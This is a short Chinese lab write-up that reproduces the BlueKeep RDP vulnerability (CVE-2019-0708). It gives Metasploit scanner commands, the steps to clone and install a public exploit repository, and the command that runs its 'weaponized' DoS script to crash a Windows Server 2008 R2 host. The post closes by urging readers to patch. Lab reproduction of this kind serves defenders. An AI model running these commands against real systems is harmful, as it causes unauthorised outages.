zoukankan      html  css  js  c++  java
  • CVE-2019-0708漏洞复现

    前言:

    该漏洞前段时间已经热闹了好一阵子了,HW期间更是使用此漏洞来进行钓鱼等一系列活动,可为大家也是对此漏洞的关心程度,接下里就简单的演示下利用此漏洞进行DOS攻击。当然还有RCE的操作,这只演示下蓝屏DOS操作。

    漏洞影响的操作系统:

    • Windows 2003
    • Windows XP
    • Windows Vista
    • Windows 7
    • Windows Server 2008
    • Windows Server 2008 R2

    实验环境:

    parrot linux:10.10.202.8/24

    Windows server 2008 R2: 10.10.202.9/24

    首先进行扫描,此漏洞的前提开启3389远程桌面。

    这里使用msf进行扫描,注意msf升级到最新的msf5

    msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

    msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 10.10.202.9
    rhosts => 10.10.202.9
    msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

    接下来我们使用exp来进行攻击

    # git clone https://github.com/Ekultek/BlueKeep

    # cd BlueKeep

    # pip install -r requirements.txt

    # ./setup.sh

    执行完以上就顺利安装完成。我们进行攻击下

    执行payload:

    └──╼ $sudo python bluekeep_weaponized_dos.py  -i 10.10.202.9

    瞬间就挂了,可以看到漏洞还是很严重的,请各位还是尽快的打补丁吧!

  • 相关阅读:
    How to configure security of ActiveMQ ?
    CentOS 搭建 nginx + tomcat
    25个 Git 进阶技巧
    写给Git初学者的7个建议
    my links
    Shell scripts to Create a local dir base on the time.
    81For全栈技术网
    一款可视化的在线制作H5
    在线制作h5
    在线制作h5——上帝的礼物
  • 原文地址:https://www.cnblogs.com/hack404/p/11338900.html
Copyright © 2011-2022 走看看